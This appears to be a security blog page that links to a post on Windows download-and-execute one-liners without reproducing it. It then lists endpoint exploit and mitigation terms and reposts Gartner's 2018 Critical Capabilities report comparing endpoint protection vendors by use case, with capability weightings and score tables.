Windows oneliners to download remote payload and execute arbitrary code

arno0x0x

In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself “what are the coolest command lines an attacker could use besides the famous powershell oneliner” ?

View original post 1,333 more words

Advertisements

Endpoint Exploits

Endpoint Exploits

  • Powershell
  • JAVA
  • DEP
  • UASLR
  • Heap Spray Checks
  • SEH Protection
  • T01 Compatibility
  • Null Dereference Protection
  • Font Protection
  • Heap Spray Mititigation
  • Heap Corruption Mitigation
  • ROP Mitigation
  • DLL Hijacking
  • DLL Security
  • Packaged DLLs
  • Hot Patch Protection
  • ShellLink Protection
  • Enhanced DLL Security
  • Enhanced JIT Protection
  • JIT Mitigation
  • CPL Protection
  • SysExit
  • GS Cookie
  • Child Process Protection
  • Gatekeeper Enhancement
  • Dylub-Hijacking
  • Kernel Priviledge Esclation
  • Pass the Hash Attacks
  • SQLi
  • XXE

Critical Capabilities for Endpoint Protection Platforms

Critical Capabilities for Endpoint Protection Platforms

Published 30 April 2018 – ID G00334896 – 33 min read


Endpoint protection is evolving to address security architecture tasks such as hardening, investigation, incident detection and incident response. Security and risk management leaders should evaluate EPP vendors’ ability to keep up with modern endpoint threats and their deployment requirements.

Overview

Key Findings

  • Advanced prevention capabilities such as machine learning, software behavior analytics and exploit prevention are no longer only available from newer EPP vendors; rather, they have become part of the core set of prevention solutions offered by nearly all vendors in this market.
  • Many Type B organizations want to incorporate advanced EDR capabilities as a means of actively detecting and responding to threats; however, EDR solutions remain challenging to deploy and operate for most.
  • Most Type B and Type C organizations eventually elect to use EDR as a forensics-focused solution if they operate it themselves, or they opt to engage managed services to supplement their internal capabilities.
  • The appeal of traditional EPP suites has somewhat been tempered over the recent years, with the emphasis and focus on newer malware detection features and capabilities such as machine learning and behavioral analysis. Still, many Type B and Type C organizations continue to derive significant value from the integration and common management provided by them.

Recommendations

Security and risk management leaders responsible for endpoint protection platforms:
  • Type A organizations: Focus on solutions that are flexible and customizable to meet their operational requirements.
  • Type B organizations: Focus on a blend of prevention and detection and response capabilities commensurate with the skills and experience of their security operations teams. Alternatively, evaluate MSS and MDR capabilities to extend their internally available capabilities.
  • Type C organizations: Emphasize prevention-focused solutions. Evaluate EDR mainly as a forensics capability only, and favor solution providers that also offer MSS and MDR capabilities.

Strategic Planning Assumption

By 2021, endpoint protection platforms (EPPs) will provide automated, orchestrated incident investigation and breach response. Separate, stand-alone endpoint detection and response (EDR) solutions will focus on managed security service provider (MSSP) and large enterprise security operations center (SOC) environments.

What You Need to Know

This document was revised on 29 May 2018. The document you are viewing is the corrected version. For more information, see the  Corrections page on gartner.com. 
This Critical Capabilities research is based on the same data set used for the 2018 Magic Quadrant for Endpoint Protection Platforms. Both documents evaluate products that were publicly available on or before 14 November 2017.
In September 2017, in response to changing market dynamics and client requirements, Gartner adjusted its definition of an EPP. An EPP is a solution deployed on endpoint devices to prevent file-based malware, to detect and block malicious activity from trusted and untrusted applications, and to provide the investigation and remediation capabilities needed to dynamically respond to security incidents and alerts (see  “Redefining Endpoint Protection for 2017 and 2018”). 
Organizations are placing a premium on protection and detection capabilities within an EPP, and are depreciating the EPP vendors’ ability to provide data protection capabilities such as data loss prevention, encryption or server controls. Security buyers are increasingly looking to the built-in security capabilities of their OS vendors, and most organizations are adopting disk encryption at the OS level with BitLocker in Microsoft Windows 10 and FileVault in Apple macOS.
Concurrently, protection for servers has diverged from EPP, with specialized tools to address the modern hybrid data center (cloud and on-premises; see  “Market Guide for Cloud Workload Protection Platforms”). Gartner recommends that organizations separate the purchasing decisions for server workloads from any product or strategy decisions involving endpoint protection. The evolutionary shift from hardware servers to virtual machines (VMs), containers and private/public cloud infrastructure means that server workloads now have different security requirements compared to end-user-focused, interactive endpoints (see  “Endpoint and Server Security: Common Goals, Divergent Solutions”). 
This is a transformative period for the EPP market, and as the market has changed, so has the analysis profile used for this research. In the 2017 Magic Quadrant for Endpoint Protection Platforms, capabilities traditionally found in the EDR market (see  “Market Guide for Endpoint Detection and Response Solutions”) were considered as “nice to have” features. In this 2018 research, some of these features are now core components of an EPP that can address and respond to modern threats. 
Note that definitions of Type A, B and C organizations are found in the Use Cases section.

Analysis

Critical Capabilities Use-Case Graphics

Figure 1. Vendors’ Product Scores for Type A Use Case

Source: Gartner (April 2018)

Vendors' Product Scores for Type A Use Case

Figure 2. Vendors’ Product Scores for Type B Use Case

Source: Gartner (April 2018)

Vendors' Product Scores for Type B Use Case

Figure 3. Vendors’ Product Scores for Type C Use Case

Source: Gartner (April 2018)

Vendors' Product Scores for Type C Use Case

Vendors

Bitdefender

Bitdefender provides a solution that is among the highest evaluated effectiveness across a broad range of platforms and capabilities in third-party scores. Its solution is the most repackaged across all EPP vendors. Bitdefender offers EPP and EDR in one platform, and one agent across endpoints, and physical, virtual or cloud servers. While a large part of the installed base is in the consumer segment, the gap between enterprise and consumer business is narrowing.
Bitdefender is a good choice for organizations that value malware detection accuracy and performance, as well as full support for data center and cloud workloads from a single solution provider. Bitdefender is also a partner for Microsoft’s Windows Defender Advanced Threat Protection (ATP) platform, providing agents for Linux and macOS.
The vendor continues to round out its endpoint features for larger enterprises. However, its brand awareness remains low. Bitdefender’s cloud-based, single-agent approach, large installed base, and recently released EDR module keep it relevant in this space.

Carbon Black

Carbon Black is in the middle of a significant corporate transition, consolidating its overall offerings into a new cloud-based security platform called Predictive Security Cloud. The company’s overall offerings consist of Cb Defense (EPP), Cb Response (threat hunting and incident response), and Cb Protection (application whitelisting and device lockdown). Carbon Black began to consolidate EDR features from Cb Response into Cb Defense in 2017 as it started to build a presence in the EPP market. With the upcoming movement to cloud-based management and agent consolidation, Carbon Black implementations should become much simpler for its clients.
Cb Response is typically found in more complex environments with very mature security operations teams. The Cb Defense agent collects and sends all the unfiltered endpoint data to the cloud using a proprietary data streaming mechanism that eliminates bursting and peaks on networks.

Cisco

Cisco’s Advanced Malware Protection (AMP) for Endpoints consists of prevent, detect and respond capabilities deployed as a cloud-managed solution that can be hosted in a public or private cloud.
Cisco’s AMP for Endpoints leverages similar technology to the AMP capabilities in other Cisco products. Its AMP Cloud technology detects known threats, and uses threat intelligence data from Threat Grid and Talos security researchers for exploit prevention.
Gartner clients rarely shortlist AMP for Endpoints for its technology. When they do, it is usually because they get a strong financial incentive when purchasing other Cisco products. AMP for Endpoints did not participate in public endpoint-focused third-party testing in 2017, which impacts its scores in this Critical Capabilities.
Cisco’s AMP solution has the most appeal for existing Cisco clients that leverage other Cisco security solutions and aspire to establish security operations around Cisco products.

Comodo

The Comodo brand is best-known as a digital certificate authority. In October 2017, Francisco Partners acquired a majority stake in Comodo’s certificate authority business, with Comodo planning to focus on its endpoint protection strategy.
Comodo Advanced Endpoint Protection (AEP) includes malware protection, a host-based intrusion prevention system (HIPS), web filtering, a personal firewall, sandbox analysis, vulnerability analysis and patching, and a classification capability that helps guarantee a good or bad verdict on all executable files. When an executable is untrusted or unknown, it is run in a tightly controlled container to isolate any potentially malicious activity.
Comodo also sells secure web gateways, web application firewalls and mobile device management focused on midsize enterprises and small and midsize businesses (SMBs). Its security products are managed from a central web-based portal that manages service request ticketing and workflow.

CrowdStrike

CrowdStrike Falcon’s lightweight single agent supports all environments (physical, virtual and cloud) and functions with the same agent and management console for Falcon Prevent protection and Falcon Insight EDR. With its EDR heritage, CrowdStrike records most endpoint events and sends all recorded data to its cloud for analysis and detection. Some prevention is done locally on the agent.
Alongside EPP and EDR capabilities, CrowdStrike offers a complementary service called Falcon OverWatch that is widely used by its clients.
Falcon OverWatch provides managed threat hunting, alerting, response and investigation assistance.
Organizations with small or no SOC teams will find the combination of Falcon OverWatch and Falcon Endpoint Protection compelling. CrowdStrike also offers a well-respected breach response service.

Cylance

Cylance was one of the pioneers in using machine learning (ML) to detect file-based malware, but by 2017, most EPP competitors claimed to have added ML capabilities, pressuring Cylance to more aggressively address non-file-based attacks. In late May 2017, Cylance formally launched its EDR product, CylanceOPTICS, which was late to market compared to other vendors, and is generally perceived to be lacking in advanced capabilities already available in key competing products.
Eighty-five percent of Cylance’s business is in North America, although the company has about 3,700 customers across the globe, half of which represent organizations with fewer than 500 seats.
CylancePROTECT is cloud-based, with Cylance hosting and managing the console infrastructure directly. The vendor finally started participating in the VirusTotal community in 2017, but has a poor third-party test participation record when compared with established EPP vendors.
Cylance is a good EPP shortlist candidate for organizations requiring a lightweight, low-impact client agent.

Endgame

Endgame is a privately held organization that has evolved from pure EDR for large enterprises and defense organizations, with the addition of prevention capabilities for the broader enterprise market.
Endgame is one of the few vendors in this analysis that sells a single product offering — meaning there are no additional add-ons or purchases — to address protection, detection and response use cases.
The platform is missing a number of traditional EPP-related features, such as application control and suspicious file quarantining. Yet Endgame scores well in protection capabilities by focusing on the tools, techniques and procedures used by adversaries, rather than simply looking for bad files.
Endgame’s big differentiator is in its investigation and threat-hunting capabilities, where natural language understanding (NLU) queries, such as “Search for PowerShell” and “Find NetTraveler,” allow organizations to make use of advanced detection capabilities without the need for deep experience.
Endgame is a good EPP shortlist candidate for organizations with an existing or emerging SOC where incident investigation and response is a key requirement.

ESET

ESET has a strong EPP market share among SMBs to large enterprises. It provides protection with a lightweight agent that includes a large protection stack, consisting of a host-based intrusion prevention system (HIPS), ML, exploit prevention, detection of in-memory attacks and ransomware behavior detection.
ESET recently launched an additional platform for EDR capabilities, called Enterprise Inspector. Customers with experienced security staff will be able to inspect and modify the detection rules within Enterprise Inspector, and further tailor them to their unique requirements.
ESET has significant security community mind share through published research, disruption of organized crime and its WeLiveSecurity website. The vendor’s evaluation is impacted in this assessment by its limited cloud management capabilities, and the relative lateness of its EDR capabilities.
ESET has localized support in 35 languages, which means it is an attractive choice for globally distributed organizations. Its protection capabilities make it a solid shortlist candidate for any organization.

FireEye

FireEye is a security suite vendor that provides email, web, network, endpoint security and threat intelligence, which are managed in the Helix security operations platform.
FireEye revenue from its HX Series endpoint security product is a relatively small portion of the vendor’s overall business. The HX management console is deployed through the cloud or as a virtual or on-premises hardware appliance that supports up to 100,000 endpoints.
FireEye Endpoint Security 4.0 shipped in late September 2017; therefore, market response to FireEye’s endpoint protection capabilities was limited during this research period.

Fortinet

Fortinet is a network security suite vendor whose products include enterprise firewalls, email security, sandbox, web application firewalls and its FortiClient endpoint security software. FortiClient includes components designed to work in conjunction with Fortinet products, including FortiGate (firewall), FortiSandbox, FortiMail, FortiWeb and others.
FortiClient is not well-known to most Gartner clients that inquire about endpoint security, and we see little adoption of it outside of Fortinet’s client base. FortiClient is becoming more focused on the enterprise space, but its current installed base is mostly in the SMB space, and about half of its customers have less than 1,000 seats installed.
Gartner clients will find Fortinet most appealing when integrated as part of an existing Fortinet deployment.

F-Secure

In 2017, F-Secure continued with its long track record for high-accuracy, lightweight and low-impact anti-malware detection with its cloud-based F-Secure Protection Service for Business (PSB) offering and on-premises solution, F-Secure Business Suite. F-Secure added an integrated password manager with password protection capabilities and improved device control management to PSB and Business Suite. F-Secure also added ML capabilities to Rapid Detection Service, which is its managed EDR solution.
Over the past 12 months, F-Secure further enhanced its product deployment and management capabilities, making it a good choice for larger, more complex enterprises.
F-Secure is focusing its investments in its managed service offerings, and has added product enhancements with a specific focus on preventing ransomware attacks.

Kaspersky Lab

Kaspersky Lab’s research team makes up one-third of the organization, and is well-known for its accurate malware detection and in-depth investigation and analysis of many sophisticated attacks.
Kaspersky Lab is late to market with EDR capabilities, and has no vendor-managed, SaaS-type cloud-based management options for organizations with more than 1,000 endpoints to manage.
In September 2017, the U.S. government ordered all federal agencies to remove Kaspersky Lab’s software from their systems. Furthermore, several media reports, citing unnamed intelligence sources, have claimed that Kaspersky’s software was being used by the Russian government to access sensitive information. Although the U.S. government has not given any official explanation for the ban, Kaspersky Lab vehemently refutes the unsubstantiated claims and stresses that there has yet to be any evidence produced of its alleged wrongdoing. Kaspersky maintains that the actions lack sufficient basis and are unconstitutional, and has initiated legal action against the U.S. government. Gartner clients, especially those who work closely with U.S. federal agencies, should continue to monitor this situation for updates.
From a technology and malware prevention perspective, Kaspersky Lab remains a good candidate as a solution for any organization that is not constrained by U.S. government recommendations. Despite the media stories surrounding Kaspersky Lab, it continues to grow its endpoint presence globally.

Malwarebytes

In 2017, Malwarebytes delivered cloud-based management, and added mainstream and advanced EDR capabilities to its single agent, which includes the breach remediation tools for remediating infections. It is one of the few vendors in this space that can roll back the changes made by ransomware, including restoring files that were encrypted in the attack. This ransomware remediation can be performed remotely from the cloud management console up to 72 hours after the attack, without the need for any local access to an endpoint.
For organizations with small IT or security teams, Malwarebytes provides strong protection capabilities and some advanced EDR capabilities, all at an attractive price point. For larger organizations or organizations with a mature security team, there are some missing enterprise features that make the Malwarebytes solution a challenge to incorporate into an existing SOC workflow.

McAfee

Intel completed the sale of 51% McAfee to TPG in April 2017 and, as a stand-alone company, McAfee has refocused its efforts on the core aspect of its business: endpoint protection. McAfee remains one of the top three incumbent EPP vendors by market share, and its execution issues over the past three years make it the top competitive target for displacement by other vendors in the EPP Critical Capabilities.
Specifically, Endpoint Security (ENS) version 10.x (v.10.x) upgrades remained a very challenging adoption cycle for most McAfee clients. The feature set and protection capabilities included in the most recent release are quite compelling, and public test scores have improved over the past year. However, McAfee’s execution assessment is hampered by organizations continuing to be hesitant to adopt the latest version, leaving those organizations vulnerable to commodity malware as well as more advanced threats. Gartner client inquiry data identified McAfee as the single most-quoted EPP vendor that clients were planning to replace. Customer satisfaction scores were low again for 2017.
McAfee’s ePolicy Orchestrator (ePO) continues to be the most quoted reason for clients initially adopting McAfee solutions in their environment, or for retaining McAfee over their contract terms and subsequent renewals. However, disenchantment with the EPP product is quickly eroding the perceived value of ePO in favor of vendors with cloud-based EPP management.
McAfee remains a good shortlist candidate for medium and larger organizations requiring an effective solution and that have a focus on an integrated management and reporting capability.

Microsoft

Microsoft is unique in the EPP space, as it is the only vendor with the capacity to embed protection features directly into the OS. It has used this advantage to step up its efforts in security with Windows 10 features, improvements to Windows Defender (also known as System Center EndpointProtection), and the addition of Windows Defender Advanced Threat Protection and Windows Defender Security Center.
Windows 10 OS-level features and capabilities available with Windows Enterprise E3 and E5, such as Application Guard, App Locker, Secure Boot, Device Guard, Exploit Guard, Advanced Threat Protection (ATP) and Credential Guard, significantly improve protection against current common threats. However, these protections are not as integrated in previous OS versions.
Overall, Microsoft now provides a broad range of security protections that address a wide spectrum of threats across endpoint, Office 365 and email. The comprehensive solution set will resonate with most organizations’ security requirements, provided their budgets stretch to the higher-tier, E5-level subscription.
Microsoft has become the most-asked-about vendor during EPP-related Gartner client inquiry calls, and there is significant interest in using the security capabilities in Windows 10 to reduce security spend with other vendors. However, while it is improving its detection rates, the solution continues to be challenged to protect against sophisticated threats, and manageability of the solution remains a challenge.

Palo Alto Networks

Palo Alto Networks is still best-known to Gartner clients for its next-generation firewall (NGFW) product line, and this continues to be the main line of introduction to Palo Alto Networks Traps for Gartner clients.
Traps uses a stack of nonsignature detection capabilities, such as ML, static and dynamic analysis, as well as monitoring processes and applications as they are spawned for suspicious activity and events. Suspect files from the endpoint can be tested by Palo Alto Networks WildFire, its cloud-based threat analysis and malware sandboxing platform, which is included with a Traps subscription.
Palo Alto Networks acquired LightCyber in 2017; its behavioral-based analytics technology provides automated detection of suspicious user and entity activity indicative of malware. Traps without LightCyber currently offers limited EDR capabilities, which impacts its scores in this assessment.
Gartner clients will find Palo Alto Networks Traps most appealing when it can integrate with an existing Palo Alto Networks NGFW deployment.

Panda Security

Panda Security’s main value proposition is the classification or attestation of every single executable file and process on a protected endpoint device. It is the only vendor to include a managed threat hunting service in the base purchase of its EPP. Adaptive Defense 360 is fully cloud managed, and combines EPP and EDR into a single offering and single agent.
The attestation service implements an automatic application whitelisting model, where only trusted and approved applications and processes are able to execute.
Panda Security’s cloud-first approach, and the managed services backing the EPP and EDR capabilities, are beginning to increase brand awareness outside of Europe.
Organizations without experienced security staff will find Panda Security a good shortlist candidate for an EPP solution, as will organizations considering managed detection and response solutions that are prepared to replace their incumbent EPP vendor.

SentinelOne

SentinelOne is a part of the new wave of EPP solution providers that have experienced fast growth over the past few years. The cloud-based solution is designed around an embedded EDR feature set and behavioral protection. SentinelOne was one of the first vendors to offer a ransomware protection guarantee based on its behavioral detection and file journaling features.
SentinelOne offers endpoint visibility for investigative information in real time, and an API to integrate common-format, indicator of compromise (IOC)-based threat feeds.
SentinelOne is a good prospect to replace or augment existing EPP solutions for any organization looking for a solution with strong protection and visibility.

Sophos

In March 2017, Sophos acquired Invincea — a Visionary vendor in the 2017 Magic Quadrant for Endpoint Protection Platforms — giving Sophos access to its deep-learning ML algorithms.
The Sophos Intercept X product, designed to protect against and recover from the malicious actions related to ransomware and exploits, is available to Sophos Endpoint Protection customers and as an augmentation to an incumbent EPP.
Also included in the Intercept X purchase are Sophos’ EDR-like capabilities — called Root Cause Analysis — and the ML malware detection technology from the acquisition of Invincea, which was added in late 2017.
Sophos’ cloud-based EPP with the Intercept X platform is a good fit for organizations that can take advantage of a cloud-based administration platform, and that value strong protection against ransomware and exploit-based attacks over advanced forensic investigation capabilities.

Symantec

Symantec continues to provide one of the most comprehensive EPPs available in this market, with third-party test scores remaining in the top tier. Symantec has added advanced features to better address the changing threat landscape, becoming the first vendor to combine malware protection, EDR, system hardening and deception capabilities in a single agent. Application whitelisting continues to be a weak point.
Symantec has begun the process of migrating its offerings to a cloud-first model, with a hybrid option available to clients that prefer to maintain some of the management capabilities on-premises.
Symantec remains a good shortlist candidate for organizations of all sizes.

Trend Micro

Trend Micro is the third-largest vendor in the EPP market, with products ranging across network, data center and endpoint systems. It has a large worldwide footprint, with more than half of its business coming from Japan and the Americas.
Although the vendor has had a rather unremarkable year from a technology innovation perspective, it ticks boxes for mainstream EPP requirements, particularly for those looking for a comprehensive suite of solutions at an affordable price. Trend Micro’s EDR solution is delivered as a separate agent to the EPP solution. While it integrates with additional on-premises products like the Deep Discovery sandbox, it lacks integration with its cloud sandbox, and cannot be managed from Trend Micro’s cloud platform.
One of Trend Micro’s biggest advantages is its vulnerability assessment and virtual patching technology, which uses an IPS engine to detect vulnerabilities, and uses HIPS to create a virtual patch to block the exploitation.
Trend Micro remains a good shortlist candidate for organizations of all sizes.

Context

When selecting EPP solutions, enterprises should evaluate them in terms of support for specific use cases. Vendors differ in their ability to accommodate different use cases. This research ranks vendors’ solutions against typical use cases.

Product/Service Class Definition

Gartner reviewed the following classes of products and services: prevention, console alerting and reporting, EDR core functionality, EDR advanced response, third-party integration, EPP suite, managed services, geographic support, and OS support.

Critical Capabilities Definition

Prevention

This is the quality, quantity, accuracy and ease of administration of an EPP’s anti-malware technology.
It covers the tools required to block file-based malware attacks, detect and prevent fileless malware attacks, and mitigate the risk of OS and application vulnerabilities. We look at test results from various independent testing organizations and data from VirusTotal, and use Gartner client inquiries as guides to the effectiveness of these techniques and implementations against modern malware.
EPP Suite

This is the support for EPP components traditionally offered as part of an extended EPP suite, in addition to anti-malware and anti-exploit based prevention.
These include offerings for a personal firewall, port and device control, application control, enterprise mobility management, data protection (such as full disk and file encryption) and data loss prevention. Vendors that offer a broad range of capabilities as part of an extended EPP suite are given extra credit here.
Console Alerting and Reporting

This is the provisioning of a centralized, role-centric console or dashboard that enhances the real-time visibility of an organization’s endpoint security state.
It provides clearly prioritized alerts and warnings and intuitive administration workflows. Vendors that have delivered a cloud-first model with feature parity to an on-premises management platform are given extra credit, as organizations struggle to maintain visibility and control over endpoints in use by the increasing remote workforce.
EDR Core Functionality

This is the EDR component’s capabilities for discovering, reporting and prioritizing vulnerabilities present in the environment.
It provides educated guidance for customers to visualize and investigate incidents, remediate malware infections and provide clear root cause analysis, helping reduce the attack surface. EDR core capabilities are typically focused on a forensics use of EDR, meaning investigating an event well after it has occurred. Vendors that focus on lowering the knowledge and skills barrier through guided response tools and easy to-understand and easy-to-use user interfaces are given extra credit here.
EDR Advanced Response

These are the EDR component’s advanced investigative and remediation capabilities, complex automation, and ability to send and receive detailed investigative workflow information.
It provides capabilities and customizations that push EDR from a functionally forensics-focused use case to an adaptable detection and response platform that can detect and investigate an event as it occurs. Vendors that focus on providing advanced customization capabilities required by an active security operations center are given extra credit here.
Third-Party Integration

This is the support via APIs, and unilateral and bidirectional integration of third-party on-premises and cloud-based solutions, such as Active Directory, security information and event management (SIEM), sandboxes, firewalls, threat and indicators of compromise feeds, and SOAR/orchestration.
It provides the ability to have unilateral and bilateral communications between the endpoint agent and/or console and third-party resources to enhance the prevention, detection, analysis and response capabilities with the rich data only available on these other platforms. Vendors that not only focus on providing a set of APIs for their own products, but that also have demonstrated integrations with a widely diverse set of third parties to provide additional context and correlation of events, are given extra credit here.
Managed Services

This is support for managed security solutions (MSS) and managed detection and response (MDR) offerings.
MSS offerings typically focus on the deployment and remote operation of traditional endpoint security solutions, including most of the components of a traditional EPP suite. MDR offerings focus on remotely delivering a managed security service that responds to threats that have made it past the prevention capabilities deployed within an environment. MDR solutions that actively detect, investigate, contain and mitigate threats are given extra credit here.
Geographic Support

This is a vendor’s ability to support global customers, as well as the number of languages it supports.
Vendors offering local, regional support offices, 24/7 support in each client region, and other local resources to assist with the deployment and operation of their solutions in a global deployment context (including MSS and MDR) are given extra credit here.
OS Support

This is a vendor’s ability to support the typical operating systems found in client organizations.
Several vendors focus solely on Windows endpoints. Solutions that can also support macOS and Linux with near parity on the features delivered in the Windows clients, most notably in advanced prevention and the activity and event monitoring areas of EDR, are given extra credit here.

Use Cases

Type A

Type A organizations, also referred to as “lean forward” organizations, adopt new technologies very early in the adoption cycle.
Type A organizations represent the smallest group of organizations. They have the budgeting and staffing resources to configure and implement new technologies and solutions rapidly within their environment. These organizations tend to focus on best-of-breed solutions that best address their business, technology and security needs and have the capacity to integrate, develop or build custom-made components as required. They see the use of technology as competitive differentiator. Their tolerance for risk is high and their approach to technology change is to run projects in parallel having multiple teams working on technology and business changes simultaneously. For EPP, these organizations focus on best-of-breed prevention, detection and response.
Type B

Type B organizations aim to stay relatively current on technology without getting too far ahead or behind their competition.
Type B organizations represent the largest group of organizations. They typically experience budgeting and staffing resource constraints and, as a result, focus on overall value by weighing the risks of the early use of new technology against the benefits. Their focus is on technology deployments that improve their organization’s productivity, product quality, customer service and security. Type B organizations typically wait for a technology to become mainstream before considering implementation. They tend to be moderate in their approach, frequently using benchmarks within their industry to justify their investments in technology. Type B organizations balance innovation with reasonable caution when selecting new solutions. For EPP, these organizations focus on a blended approach between prevention, detection and response capabilities that can be complimented with managed services where needed.
Type C

Type C organizations typically view technology as an expense or operational necessity, and use it as a means to reduce costs.
Type C organizations represent the second-largest group. These organizations experience severe budgeting and staffing resource constraints and, as a result, prefer simply to deploy and use integrated solutions with managed services add-ons that can best complement their minimal staff. These organizations wait for technologies to become absolutely stable and for costs to acquire and operate to reach the lowest quartile before committing to purchase. For EPP, these organizations focus on prevention, rather than on integrated detection and response capabilities and solutions that offer a complement of managed services.

Vendors Added and Dropped

Added

None

Dropped

None

Inclusion Criteria

Inclusion in this Critical Capabilities was limited to vendors that met these minimum criteria:
  • The majority of detection events must be from the vendor’s own detection technique, and designed, owned and maintained by the vendor itself. Augmenting with an OEM engine is acceptable, provided it is not the primary method of detection.
  • The vendor’s nonconsumer EPP must have participated in independent, well-known, public tests for accuracy and effectiveness within the 12 months prior to 18 November 2017, or be a current participant in the VirusTotal public interface. Examples include Virus Bulletin, AV-TEST, AV-Comparatives, NSS Labs and SE Labs.
  • The vendor must have more than five named accounts larger than 10,000 seats that use the vendor’s EPP as their sole EPP.
  • The vendor must have a minimum of 500,000 deployed licenses, protecting nonconsumer endpoints, with at least 50,000 of those licenses protecting nonconsumer endpoints within North America.
  • The vendor must satisfy at least 12 of the following “basic” capabilities, and at least four of the following “desirable” capabilities:
    • Basic capabilities:
      • Blocks known and unknown file-based malware, without relying on daily signature distribution
      • Detects suspicious and malicious activity based on the behavior of a process
      • Implements protection for common application vulnerabilities and memory exploit techniques
      • Can perform static, on-demand malware detection scans of folders, drives or devices such as USB drives
      • Suspicious event data can be stored in a centralized location for retrospective IOC and indicator of attack (IOA) searching and analysis
      • Allows real-time IOC/IOA searching across all endpoints (for example, file hash, source/destination IP, registry key)
      • Allows remote quarantining of an endpoint, restricting network access to only the EPP management server
      • Automatically updates policies, controls and new agent/engine versions without connecting directly to the corporate network
      • Continues to collect suspicious event data when outside of the corporate network
      • Detections and alerts include severity and confidence indicators, to aid in prioritization
      • Provides risk-prioritized views based on confidence of the verdict and severity of the incident
      • Displays full process tree to identify how processes were spawned, for an actionable root cause analysis
      • Automatically quarantines malicious files
      • Identifies changes made by malware, and provides the recommended remediation steps
      • Detects, blocks and reports attempt to disable or remove the EPP agent
    • Desirable capabilities:
      • Primary EPP console uses a cloud-based, SaaS-style, multitenant infrastructure, and is operated, managed and maintained by the vendor
      • Implements vulnerability shielding (aka virtual patching) for known vulnerabilities in the OS and for non-OS applications
      • Can implement default-deny whitelisting with a vendor-maintained “app store”-type approach and user self-service features
      • Can implement application isolation to separate untrusted applications from the rest of the system
      • Includes access to a cloud- or network-based sandbox that is VM-evasion-aware
      • Includes deception capabilities designed to expose an attacker
      • Vendor itself offers managed detection services, alerting customers to suspicious activity
      • Vendor itself offers managed threat hunting, or managed IOC/IOA searching, for detecting the existence of threats (not via a third party or channel)
      • Supports advanced natural-language queries with operators and thresholds (for example, “Show all machines with new PE >1 week old AND on <2% of Machines OR Unknown”)
      • Provides guided analysis and remediation based on intelligence gathered by the vendor (for example, “85% of organizations follow these steps”)
      • Provides attribution information and potential motivations behind attacks
      • Can utilize third-party, community and intelligence feeds
      • Allows remote remediation via the management console
      • Includes APIs for integration with security orchestration, automation and response (SOAR)/orchestration for automation 

Table 1: Weighting for Critical Capabilities in Use Cases

Enlarge Table
Critical Capabilities
Type A
Type B
Type C
Prevention
10%
15%
20%
Console Alerting and Reporting
5%
15%
20%
EDR Core Functionality
20%
15%
10%
EDR Advanced Response
20%
5%
0%
Third-Party Integration
15%
5%
0%
EPP Suite
5%
10%
15%
Managed Services
5%
15%
25%
Geographic Support
10%
10%
5%
OS Support
10%
10%
5%
Total
100%
100%
100%
Source: Gartner (April 2018)
This methodology requires analysts to identify the critical capabilities for a class of products/services. Each capability is then weighed in terms of its relative importance for specific product/service use cases.

Critical Capabilities Rating

Each of the products/services has been evaluated on the critical capabilities on a scale of 1 to 5; a score of 1 = Poor (most or all defined requirements are not achieved), while 5 = Outstanding (significantly exceeds requirements).

Table 2: Product/Service Rating on Critical Capabilities

Enlarge Table
Critical Capabilities
Bitdefender
Carbon Black
Cisco
Comodo
CrowdStrike
Cylance
Endgame
ESET
FireEye
Fortinet
F-Secure
Kaspersky Lab
Malwarebytes
McAfee
Microsoft
Palo Alto Networks
Panda Security
SentinelOne
Sophos
Symantec
Trend Micro
Prevention
4.5
2.3
2.3
3.5
3.5
3.0
3.7
4.5
2.3
2.5
4.0
4.8
4.5
4.0
3.0
3.5
4.0
3.7
4.3
4.5
4.5
Console Alerting and Reporting
3.5
3.0
3.0
3.0
4.0
3.0
3.5
4.0
3.0
2.8
3.5
3.8
4.0
4.3
2.2
3.0
3.3
3.5
4.0
4.0
3.8
EDR Core Functionality
2.5
3.0
3.0
2.5
4.0
3.0
4.0
3.3
3.5
3.0
4.0
3.2
3.5
3.3
3.0
2.8
3.8
3.8
2.5
3.8
3.3
EDR Advanced Response
2.0
2.0
2.2
3.0
4.5
2.2
3.5
2.8
3.5
2.5
3.2
3.2
3.3
3.2
2.5
2.0
3.2
3.8
2.5
3.8
3.2
Third-Party Integration
3.2
3.0
3.0
2.0
4.0
3.0
2.5
2.5
3.3
2.5
2.5
3.0
2.5
3.3
2.5
3.5
3.0
3.5
2.5
3.3
3.2
EPP Suite
4.0
1.0
1.0
3.0
2.0
2.0
2.0
4.0
1.0
3.5
3.8
4.5
3.8
4.5
3.0
1.7
3.0
2.5
4.5
4.5
4.5
Managed Services
3.0
2.5
3.0
2.7
4.9
3.2
2.0
2.0
3.0
2.0
3.5
3.0
2.0
2.0
2.0
2.0
3.5
2.5
2.8
2.8
2.5
Geographic Support
4.0
4.0
4.0
3.7
3.0
3.5
2.0
4.0
4.0
3.8
3.0
4.0
4.0
4.0
4.0
4.0
3.0
3.0
4.0
4.0
4.1
OS Support
4.5
3.0
3.2
3.8
3.8
3.5
2.0
3.8
3.5
3.5
3.5
3.8
2.5
3.8
1.0
2.8
3.8
4.0
3.8
4.0
3.8
Source: Gartner (April 2018)
Table 3 shows the product/service scores for each use case. The scores, which are generated by multiplying the use case weightings by the product/service ratings, summarize how well the critical capabilities are met for each use case.

Table 3: Product Score in Use Cases

Enlarge Table
Use Cases
Bitdefender
Carbon Black
Cisco
Comodo
CrowdStrike
Cylance
Endgame
ESET
FireEye
Fortinet
F-Secure
Kaspersky Lab
Malwarebytes
McAfee
Microsoft
Palo Alto Networks
Panda Security
SentinelOne
Sophos
Symantec
Trend Micro
Type A
3.21
2.71
2.79
2.94
3.88
2.90
3.02
3.33
3.23
2.87
3.41
3.56
3.33
3.52
2.64
2.85
3.42
3.54
3.15
3.83
3.56
Type B
3.54
2.67
2.78
3.06
3.77
2.99
2.88
3.52
2.96
2.88
3.57
3.76
3.42
3.60
2.58
2.82
3.48
3.34
3.52
3.87
3.68
Type C
3.63
2.49
2.62
3.05
3.77
2.95
2.84
3.52
2.69
2.75
3.67
3.86
3.45
3.56
2.54
2.68
3.51
3.17
3.68
3.86
3.69
Source: Gartner (April 2018)
To determine an overall score for each product/service in the use cases, multiply the ratings in Table 2 by the weightings shown in Table 1.

Evidence

  • Gartner responded to more than 2,100 client inquiries from 1Q17 to 1Q18.
  • Gartner conducted an online survey of 129 EPP reference customers in 4Q17.
  • Gartner conducted an online survey of 55 EPP channel references in 4Q17.

Critical Capabilities Methodology

